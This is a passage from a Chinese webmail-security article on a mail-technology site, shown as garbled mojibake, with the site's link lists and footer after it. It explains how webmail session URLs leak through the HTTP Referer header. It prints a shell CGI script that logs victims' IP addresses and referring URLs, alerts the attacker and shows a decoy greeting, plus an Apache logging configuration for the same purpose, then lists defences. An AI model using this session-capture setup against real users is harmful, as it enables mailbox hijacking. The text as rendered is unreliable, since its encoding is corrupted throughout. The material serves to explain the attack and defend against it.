²»¹ý£¬¼´Ê¹webmailϵͳµÄURL»á»°»úÖÆÔÙ¸´ÔÓ¡¢»á»°±êʶÔÙ³¤£¬¶Ô¹¥»÷Õß¶øÑÔ£¬ÒªÏë»ñµÃÓû§webmailµÄURL£¬ÍùÍù¾ÍÏñ̽ÄÒÈ¡ÎïÒ»°ãÈÝÒס£

JavaScript³ÌÐòÖеÄwindow.location¡¢location.href¡¢document.URL¡¢document.location¡¢document.referrerµÈ¶ÔÏóÊôÐÔ¶¼¿ÉÒÔÓÃÀ´»ñÈ¡webmailµÄURL£¬¹¥»÷ÕßÖ»ÒªÔÚhtmlÓʼþÖзÅÈëÒ»¶Î½Å±¾´úÂë¾Í¿ÉÒÔ»ñÈ¡URL£¬²¢ÇÒÄÜ͵͵µØ·¢Ë͸ø¹¥»÷Õߣ¬ÀàËÆµÄ´úÂë¿ÉÒԲο¼¡°cookie»á»°¹¥»÷¡±Ò»½ÚÀïµÄÒ»¶ÎÑÝʾ³ÌÐò¡£

HttpЭÒ飨RFC2616£©Àï¹æ¶¨httpÇëÇóÍ·Óò¡°referer¡±ÓÃÓÚÖ¸Ã÷Á´½ÓµÄ³ö´¦£¬¼´Ö¸Ã÷À´×Ô¿Í»§¶ËµÄÕâ¸öÁ¬½ÓÇëÇóÊÇ´ÓÄĸöURIµØÖ·Ìá½»¹ýÀ´µÄ£¬ÀýÈçÓû§µã»÷Ò³ÃæÉϵÄij¸öÁ´½ÓµØÖ·ºó£¬·¢³öµÄrefererÓòµÄÄÚÈݾÍÊǵ±Ç°Ò³ÃæµÄURIµØÖ·¡£CGI±à³ÌÖеĻ·¾³±äÁ¿¡°HTTP_REFERER¡±ÓÃÓÚ»ñÈ¡httpÇëÇóÍ·Óò¡°referer¡±£¬ÏÂÃæÊÇÒ»¸öÔÚLinuxÏÂÓÃshellдµÄCGI³ÌÐò£º

#!/bin/sh
#set -f

echo Content-type: text/plain
echo

#дÈëÈÕÖ¾£¬geturl.logÎļþȨÏÞÒª¿Éд
echo "`date` $REMOTE_ADDR $HTTP_REFERER" >> /var/log/geturl.log

#¼´Ê±Í¨Öª¹¥»÷Õß
wall "`date` ÊÕµ½webmail url£¬Çë¼ì²éÈÕÖ¾"

#·µ»Ø¸ø¿Í»§¶ËµÄÐÅÏ¢£¬ÓÃÓÚÃÔ»óÓû§
echo "ÄãºÃ£¡"

¹¥»÷Õß°ÑÕâ¸öCGI³ÌÐò·ÅÔÚ×Ô¼ºµÄweb·þÎñÆ÷ÉÏ£¬È»ºó°Ñ¸ÃCGI³ÌÐòµÄURLµØÖ·ÒÔµ¥¶ÀÒ»ÐзÅÔÚtxtÓʼþÀï·¢¸øÓû§£¬URLµØÖ·»á×Ô¶¯±ä³ÉÁ´½ÓµØÖ·£¬Êܵ½ÆÛÆ­µÄÓû§µã»÷ºó£¬¹¥»÷Õ߾ͻñµÃÁËÓû§webmailµÄURL¡£µ±È»¹¥»÷ÕßÒ²¿ÉÒÔ°ÑCGI³ÌÐòµÄURLµØÖ··ÅÔÚhtmlÓʼþÀï×öΪÁ´½ÓµØÖ·ÈÃÓû§À´µã»÷£¬»òÕß¾ÍÓýű¾³ÌÐò»ò¿ò¼Ü¼¼ÊõʹÕâ¸öCGI³ÌÐò×Ô¶¯ÔËÐУ¬»òÕ߸ɴà°ÑÕâ¸öCGI³ÌÐòµÄURLµØÖ··ÅÔÚhtmlÓʼþÔ´´úÂëimgÔªËØµÄsrcÊôÐÔÖµ£¬ËäÈ»ÏÔÏÖ²»³öͼƬ£¬µ«Õâ¸öCGI³ÌÐòÕÕÑù»áÊÕµ½httpÁ¬½ÓÇëÇ󣬴Ӷø»ñµÃwebmailµÄURL¡£

Web·þÎñÆ÷µÄÈÕÖ¾¼Ç¼ҲÄÜ»ñÈ¡refererÓòµÄÄÚÈÝ£¬ÒÔapacheΪÀý£¬ÔÚhttpd.confÎļþÖÐÐ޸Ļò¼ÓÈëÈçÏÂÅäÖòÎÊý£º

LogFormat "%t %h %{Referer}i -> %U" referer
CustomLog /usr/local/apache/logs/referer_log referer

ÕâÑù¶Ôweb·þÎñÆ÷µÄÿһ¸öhttpÁ¬½ÓÇëÇóµÄrefererÓòµÄÄÚÈݶ¼»áдµ½referer_logÈÕÖ¾ÎļþÀïÈ¥£¬¹¥»÷ÕßÖ»Òª·ÖÎöÈÕÖ¾Îļþ¾ÍÄܹ»ÖªµÀÓû§webmailµÄURLÁË¡£webmailϵͳÈç¹ûÖ§³ÖhtmlÓʼþµÄ»°£¬×ܲ»¿ÉÄÜ»á½ûÖ¹htmlÓʼþÖÐʹÓÃͼÏñ£¬¹¥»÷ÕßÔÚ·¢¸øÓû§µÄhtmlÓʼþÖзÅÈëÒ»ÕÅsrcµØÖ·ÔÚ×Ô¼ºweb·þÎñÆ÷ÉϵÄͼƬ£¬Ò²¾ÍÄÜÇáÒ׵ػñÈ¡webmailµÄURL¡£

ÕâÑùÒ»À´£¬É¶ñÒâµÄ¹¥»÷Õß»¨µãСǮȥ×öÓʼþ·þÎñÉÌÌṩµÄwebmailÆìÖÄ¹ã¸æ£¬¹ã¸æµÄͼƬÔòÊÇ·ÅÔÚ¹¥»÷ÕßµÄweb·þÎñÆ÷ÉÏ£¬ÄÇô¹¥»÷Õß¾ÍÄÜÿÌì×øÊÕ³ÉǧÉÏÍòÓû§µÄwebmailÁË¡£

ä¯ÀÀÆ÷µÄ©¶´ºÍ¶ñÒâ½Å±¾³ÌÐòµ¼ÖÂÁËcookieÐÅÏ¢µÄй©£¬ÓëcookieÐÅϢй©²»Í¬£¬URL»á»°ÐÅÏ¢±»Ð¹Â©£¬ÔòÊÇÍêÈ«³öÔÚHTTPЭÒéÉÏ£¬³ý·ÇÐÞ¸ÄHTTPЭÒé¡£ËäÈ»RFC2616ÀïÖ¸³örefererÓòÊÇÃô¸ÐÐÅÏ¢£¨Sensitive Information£©£¬½¨Òéä¯ÀÀÆ÷ÌṩÓѺýçÃæÈÃÓû§Äܹ»ÔÊÐí»ò½ûÓô«ÊäÃô¸ÐÐÅÏ¢Óò£¬²»¹ýĿǰÉÐδÓÐÄÄÒ»¼Òä¯ÀÀÆ÷ÌṩÁËÕâÑùµÄ¹¦ÄܽçÃæ¡£

¿É¼û£¬ÎÞÂÛÊÇcookie»á»°¸ú×Ù»¹ÊÇURL»á»°¸ú×Ù£¬¶¼´æÔÚ×Ų»ÉٵݲȫÎÊÌ⣬ËùÒÔwebmailϵͳÓбØÒª²ÉÈ¡´ëÊ©¼ÓÇ¿»á»°°²È«£º

1¡¢ Áé»îʹÓûỰ¸ú×Ù¼¼Êõ£º¿Í»§¶ËÖ§³Öcookieʱ£¬Ê¹ÓÃÏà¶Ô±È½Ï°²È«µÄÁÙʱÐÍcookie»á»°¸ú×Ù»úÖÆ£¬·ñÔò£¬Ê¹ÓÃURL»á»°¸ú×Ù£¬JSPµÈ¿ª·¢³ÌÐòÄܺÜÈÝÒ××öµ½ÕâÒ»µã¡£

2¡¢ ½áºÏ¶àÖֻỰ¸ú×Ù¼¼Êõ£ºÍ¬Ê±½áºÏcookie¡¢URL»á»°¸ú×Ù¼¼Êõ½øÐлỰ¸ú×Ù£¬´ó´óÔö¼Ó¹¥»÷ÕßÄѶȡ£

3¡¢ ¸ú¿Í»§¶ËIPµØÖ·Ïà½áºÏ£º21cn.com¡¢qmailµÄsqwebmailµÈwebmailϵͳ£¬¾ÍÊǰѵ±Ç°»á»°Óë¿Í»§¶ËIPµØÖ·½áºÏÔÚÒ»ÆðÀ´¼ÓÇ¿°²È«µÄ¡£

4¡¢ ºÏÀíÉèÖûỰ³¬Ê±Ê±¼ä£ºÔÚÒ»¶¨Ê±¼äÄÚ¿Í»§¶ËûÓÐÁ¬½ÓÇëÇóÔòÈÏΪ»á»°³¬Ê±£¨timeout£©¡£Ì«¶ÌÁË£¬¸øÓû§´øÀ´²»±ã£»Ì«³¤ÁË£¬¸ø¹¥»÷Õß´øÀ´·½±ã¡£

Æß¡¢WebmailÆäËû°²È«
Èç¹ûÓû§ÔÚwebmailÀïÉèÖÃÁË×Ô¶¯»Ø¸´£¬¹¥»÷ÕßÀûÓÃÕâÒ»µã£¬ÔÚÁíÒ»¸öÓÊÏäÀïÒ²ÉèÖÃ×Ô¶¯»Ø¸´£¬²¢·¢Ò»·âÓʼþ¸øÓû§£¬ÄÇôÓʼþºÜ¿ì¾Í»áÈûÂúÓû§µÄÓÊÏ䣬ÆÈʹÓû§²»µÃ²»È¡Ïû×Ô¶¯»Ø¸´£¬ËùÒÔ£¬Á¼ºÃµÄ×Ô¶¯»Ø¸´²ßÂÔÓ¦¸ÃÊÇÔÚÒ»¶¨Ê±¼äÄÚÀ´×ÔͬһÓʼþµØÖ·µÄµÚ¶þ·âÓʼþ²»Ó¦¸Ã±»×Ô¶¯»Ø¸´¡£

¹¥»÷Õß»¹»áÔÚÓʼþ¸½¼þÖмдø²¡¶¾¡¢Ä¾ÂíµÈ¶ñÐÔ³ÌÐòÀ´¹¥»÷Óû§µÄµçÄÔ£¬ÉõÖÁÓÃÀ´ÇÔÈ¡webmailÃÜÂ룬ËùÒÔ£¬¶ÔÓÚ²»Ã÷Óʼþ£¬Óû§²»ÒªÉÝÍûÄÇÊǹ¥¹åºÍÇéÊ飬ÔÚ¶Ô¸½¼þ½øÐв¡¶¾²éɱ֮ǰ£¬²»ÒªÇáÒ×´ò¿ªËüµÄ¸½¼þ¡£

ΪÁË·ÀÖ¹À¬»øÓʼþ£¬webmailϵͳӦÓÐÁ¼ºÃµÄ·´À¬»øÓʼþ¹¦ÄÜ£¬Ò»ÊÇϵͳ¼¶µÄÀ¬»øÓʼþ¹ýÂË£¬¶ÔһЩ±»Í¶ËߺÍÁÐÈë·´À¬»øÓʼþ×éÖ¯ºÚÃûµ¥µÄÓʼþµØÖ·½øÐйýÂË£¬¶þÊÇÓû§¼¶µÄÀ¬»øÓʼþ¹ýÂË£¬Ê¹webmailÓû§¿ÉÒÔ¶¨ÖÆ×Ô¼ºµÄÓʼþ¹ýÂ˹æÔò£¬¾Ü¾ø²»ÊÜ»¶Ó­µÄÓʼþ£¬ÃâÊÜÀ¬»øÓʼþµÄÀ§ÈÅ¡£

ʹÓÃһЩÐá̽¼àÌý³ÌÐò£¬¹¥»÷ÕßÉõÖÁ²»ÐèÒªºÜ¸ßÉîµÄרҵ֪ʶ£¬¾ÍÄܺÜÇáÒ×µØÐá̽¼àÌýµ½Óû§webmailµÄÃÜÂë¡¢ÓʼþÄÚÈݵȡ£ÓÐÒ»¸ö½Ð¡°ÃÜÂë¼àÌýÆ÷¡±µÄºÚ¿Í³ÌÐò£¬¼¸ºõÄܼàÌýµ½¹úÄÚËùÓÐÃâ·ÑÓÊÏäµÄÃÜÂë¡£ËùÒÔ£¬webmailϵͳÓбØÒªÖ§³Össl£¬¶Ôä¯ÀÀÆ÷Óë·þÎñÆ÷Ö®¼ä´«ÊäµÄÊý¾Ý½øÐмÓÃÜ£¬·ÀÖ¹±»Ðá̽¼àÌý¡£

һЩwebmailϵͳ֧³ÖÊý×ÖÇ©ÃûºÍÊý×Ö¼ÓÃÜ£¬ÔÚwebmailÄÚ¿ÉÒÔµ¼Èë»ùÓÚ¹«Ô¿¼ÓÃÜ»úÖÆ£¨ÈçCAÈÏÖ¤ÖÐÐİ䷢µÄÊý×ÖÖ¤Ê飩²úÉúµÄ¹«Ë½ÃÜÔ¿¶Ô£¬ÄÜÓÐЧµØ±£Ö¤ÓʼþµÄ±£ÃÜÐÔ¡¢ÍêÕûÐԺͲ»¿ÉµÖÀµÐÔ£¬²»¹ý£¬¼øÓÚwebmailÔÚÆäËû·½ÃæµÄ°²È«ÎÊÌ⣬һµ©¹¥»÷ÕßÇÖÈëÓû§µÄwebmail£¬Óû§·´¶øµÃ²»³¥Ê§£¬ÉõÖÁ»áµ¼ÖÂ˽ԿµÄй©¡£

Webmailϵͳ³ÌÐòÉϵÄ©¶´Ò²ÖµµÃ¹Ø×¢£¬ÈçIMHO WebmailÔ¶³ÌÕÊ»§½Ù³Ö©¶´¡¢BasiliX WebmailÔ¶³ÌÈÎÒâÎļþй¶©¶´¡¢W3Mail WebmailÖ´ÐÐÈÎÒâÃüÁî©¶´µÈ£¬ÉõÖÁ21cn.com¶¼ÔøÓйýÖØÒªÂ·¾¶Ð¹Â©Â©¶´¡£


´ÓÉÏÃæÎÒÃÇ¿ÉÒÔ¿´µ½£¬webmailµÄ°²È«ÎÊÌâ²»ÈÝÀÖ¹Û£¬Èç¹ûÒª½ÏºÃµØ½â¾öËü£¬Ò»·½ÃæÒªÔöÇ¿webmailϵͳµÄ°²È«ÐÔ£¬ÁíÒ»·½ÃæÔòÒÀÀµÓÚÓû§¶ÔwebmailµÄÕýȷʹÓã¬ÕâЩÔÚÉÏÃæ¶¼ÓÐÌÖÂÛ£¬Ôڴ˾Ͳ»×¸Êö¡£Èç¹ûÓû§ÔÚÕýȷʹÓÃwebmailºóÈÔÈ»´æÔÚ°²È«ÎÊÌ⣬ÄÇôʣÏµģ¬¾ÍÊÇȥѡÔñÒ»¸öºÃµÄÓʼþ·þÎñÉÌ£¬»òÕßͨ¹ýÓʼþ¿Í»§¶ËÈí¼þÀ´ÊÕ·¢Óʼþ£¬²»¹ý£¬Ê¹ÓÃoutlookµÈÓʼþ¿Í»§¶ËÈí¼þÓÖ»áÒý·¢ÆäËüµÄ°²È«ÎÊÌ⣬ÀýÈç°®³æ¡¢ÇóÖ°ÐŵȲ¡¶¾¾ÍÊÇÀûÓÃoutlookµÄ©¶´À´À©É¢´«²¥ºÍΣº¦Óû§µÄ¡£,
Ïà¹ØÎÄÕ ÈÈÃÅÎÄÕÂ
  • WinWebMail 3.7.7.1 °æÕýʽ·¢²¼
  • ÔÚWindows 2008 x64²Ù×÷ϵͳÉϲ¼ÊðWinWebMail Server
  • ÔÚWindows 2003 x64²Ù×÷ϵͳÉϲ¼ÊðWinWebMail Server
  • »¨ÉúÓÊÍÆ³öwebmail²å¼þ
  • WinWebMail 3.7.6.1 °æÕýʽ·¢²¼
  • WinWebMail 3.7.5.1 °æÕýʽ·¢²¼
  • Redhat Linux 9ÏÂ×î¼òµ¥µÄWebMailʵÏÖ·½°¸
  • Íø¹ÜÊÖ¼Ç:OpenwebmailµÄ°²×°ÅäÖÃ
  • WinWebMailʹÓÃKillʵÏÖÓʼþ·À¶¾¹¦ÄܵÄÒ»¸öÎÊÌâ
  • Webmail¡ª¡ªÃÅ»§ÍøÕ¾¿ØÖÆÀ¬»øÓʼþÍâ·¢µÄ°¢»ùÀû˹֮õà
  • WinWebMail ServerÐÂÓ¢Îİæ v3.7.3.2
  • FC5ÖÐopenwebmailµÄ°²×°
  • ÓÊÏäÃÜÂëÆÆ½âEmailCrackʹÓÃ
  • µç×ÓÓʼþ°²È«Â©¶´´óÆØ¹â--Á÷Ðпͻ§¶ËÈí¼þ֮ʹ
  • Webmail°²È«ÎÊÌâĪºöÊÓ
  • ÆÆ½âµç×ÓÓʼþ
  • ÓÃMailSpyÀ¹½Ø¾ÖÓòÍøÓʼþ
  • ÄúµÄµç×ÓÓʼþÇ©ÃûÁËÂð£¿
  • ¼ÓÃÜÄãµÄµç×ÓÓʼþϵͳ
  • ½¨Á¢¸ß¿ÉÀ©Õ¹µÄwebÓʼþϵͳ
  • ͵¿úHotmailÓû§ÓʼþÈý²¿
  • µç×ÓÓÊÏä¼°IE°²È«ÉèÖÃÖ¸ÄÏ
  • Óʼþ´æ´¢±¸·ÝÎåÖÖ¿¼ÂÇ
  • E-mail±¸·ÝµÄÈýµã¿¼ÂÇ
  • ×ÔÓÉ¹ã¸æÇø
    ¡¡
     
    ×îÐÂÈí¼þÏÂÔØ
  • ORF Enterprise Edition 4.2 Õýʽ°æ
  • WinWebMail 3.7.7.3 ±ê×¼°æ
  • WinWebMail 3.7.7.3 ÆóÒµ°æ
  • BMailì÷ÓÊ
  • Merak Email Server for Windows 9.3.1..
  • Merak Email Server for Linux 9.3.1 ¼..
  • Merak Email Server 9.3.1 For Windwos..
  • AXIGEN Mail Server 6.1.1 for Windows
  • AXIGEN Mail Server 6.1.0 for Linux
  • ADModify.NETÏÂÔØ
  • symantec10.1»ù±¾°²×°¼°ÅäÖÃÊÓÆµ½Ì³Ì
  • Backup Exec System RecoveryÖ®±¸·ÝÊÓÆ..
  • ½ñÈÕÓʼþ¼¼ÊõÎÄÕÂ
  • ÃÀ´óѧÉúÇÖÈëÅåÁÖÖݳ¤¸öÈËÓʼþÕË»§±»´þ²¶
  • ˼¿ÆIronPort·¢²¼Ðµç×ÓÓʼþ°²È«É豸
  • Éî¸û"Èí¼þ+·þÎñ" ΢Èí300³ÇÊÐѲչî£ÓÊ
  • ´ÓºÚ¿Í³£Óù¥»÷Êֶο´WEBÓ¦Ó÷À»¤
  • ÏûÏ¢ÈËʿ͸¶ÑÅ»¢ÓëAOLºÏ²¢Ï¸½Ú½«ÓÚ±¾Ô..
  • ¹È¸èÌṩµÄµç×ÓÓʼþ´æµµÊ±¼äÑÓ³¤ÎªÊ®Äê
  • ÑÅ»¢½«ÔÚÓÊÏä·þÎñÖÐÕûºÏаæÔÚÏßÈÕÀú
  • 9ÔÂÀ¬»øÓʼþ×ÜÁ¿¼õÉÙ ÓëISPµ¹±ÕÓйØ
  • À¬»øÓʼþ·¢Õ¹µÄËÄ´óÇ÷ÊÆ
  • º«¹úÒéÔ±³ÆÖйúºÚ¿Íð³äÇàÍß̨·¢ËͲ¡¶¾..
  • VistaÄÑ³ÉÆøºò Windows XPÊÙÃü±»ÑÓ³¤
  • ÈüÃÅÌú¿ËÉý¼¶DLP²úÆ·¼°·´À¬»øÓʼþÍø¹Ø
  • ×îÐÂרÌâ
  • Sendmail ÓʼþϵͳÅäÖÃ
  • ×齨Exchange 2003Óʼþϵͳ
  • Windows Server 2008 רÌâ
  • ORF ·´À¬»øÓʼþϵͳ
  • Exchange Server 2007 רÌâ
  • ISA Server 2006 ½Ì³ÌרÌâ
  • Windows Vista ¼¼ÊõרÌâ
  • ¡°ºÚÝ®¡±£¨BlackBerry£©×¨Ìâ
  • ÒÆ¶¯µç×ÓÓʼþרÌâ
  • Apache James רÌâ
  • IMail Server ²Ù×÷Ö¸ÄÏ
  • ISA Server 2004 ʹÓÃרÌâ
  • ·ÖÀർº½
    ÓʼþÐÂÎÅ×ÊѶ:
    ITÒµ½ç | Óʼþ·þÎñÆ÷ | ÓʼþȤÎÅ | ÒÆ¶¯µçÓÊ
    µç×ÓÓÊÏä | ·´À¬»øÓʼþ|Óʼþ¿Í»§¶Ë|ÍøÂ簲ȫ
    ÐÐÒµÊý¾Ý | ÓʼþÈËÎï | ÍøÕ¾¹«¸æ | ÐÐÒµ·¨¹æ
    ÍøÂç¼¼Êõ:
    ÓʼþÔ­Àí | ÍøÂçЭÒé | ÍøÂç¹ÜÀí | ´«Êä½éÖÊ
    Ïß·½ÓÈë | ·ÓÉ½Ó¿Ú | Óʼþ´æ´¢ | »ªÎª3Com
    CISCO¼¼Êõ | ÍøÂçÓë·þÎñÆ÷Ó²¼þ
    ²Ù×÷ϵͳ:
    Windows 9X | Linux&Uinx | Windows NT
    Windows Vista | FreeBSD | ÆäËü²Ù×÷ϵͳ
    Óʼþ·þÎñÆ÷:
    ³ÌÐòÓ뿪·¢ | Exchange | Qmail | Postfix
    Sendmail | MDaemon | Domino | Foxmail
    KerioMail | JavaMail | Winwebmail |James
    Merak&VisNetic | CMailServer | WinMail
    ½ðµÑÓʼþϵͳ | ÆäËü |
    ·´À¬»øÓʼþ:
    ×ÛÊö| ¿Í»§¶Ë·´À¬»øÓʼþ|·þÎñÆ÷¶Ë·´À¬»øÓʼþ
    Óʼþ¿Í»§¶ËÈí¼þ:
    Outlook | Foxmail | DreamMail| KooMail
    The bat | À×Äñ | Eudora |Becky! |Pegasus
    IncrediMail |ÆäËü
    µç×ÓÓÊÏä: ¸öÈËÓÊÏä | ÆóÒµÓÊÏä |Gmail
    ÒÆ¶¯µç×ÓÓʼþ:·þÎñÆ÷ | ¿Í»§¶Ë | ¼¼ÊõÇ°ÑØ
    ÓʼþÍøÂ簲ȫ:
    Èí¼þ©¶´ | °²È«ÖªÊ¶ | ²¡¶¾¹«¸æ |·À»ðǽ
    ¹¥·À¼¼Êõ | ²¡¶¾²éɱ| ISA | Êý×ÖÇ©Ãû
    ÓʼþÓªÏú:
    EmailÓªÏú | ÍøÂçÓªÏú | ÓªÏú¼¼ÇÉ |ÓªÏú°¸Àý
    ÓʼþÈ˲Å:ÕÐÆ¸ | Ö°³¡ | Åàѵ | Ö¸ÄÏ | Ö°³¡
    ½â¾ö·½°¸:
    Óʼþϵͳ|·´À¬»øÓʼþ |°²È« |ÒÆ¶¯µçÓÊ |Õбê
    ²úÆ·ÆÀ²â:
    Óʼþϵͳ |·´À¬»øÓʼþ |ÓÊÏä |°²È« |¿Í»§¶Ë
    ¹ã¸æÁªÏµ | ºÏ×÷ÁªÏµ | ¹ØÓÚÎÒÃÇ | ÁªÏµÎÒÃÇ | ·±ówÖÐÎÄ
    °æÈ¨ËùÓУºÓʼþ¼¼Êõ×ÊÑ¶Íø©2003-2007 www.5dmail.net, All Rights Reserved
    www.5Dmail.net Web Team   ÔÁICP±¸05009143ºÅ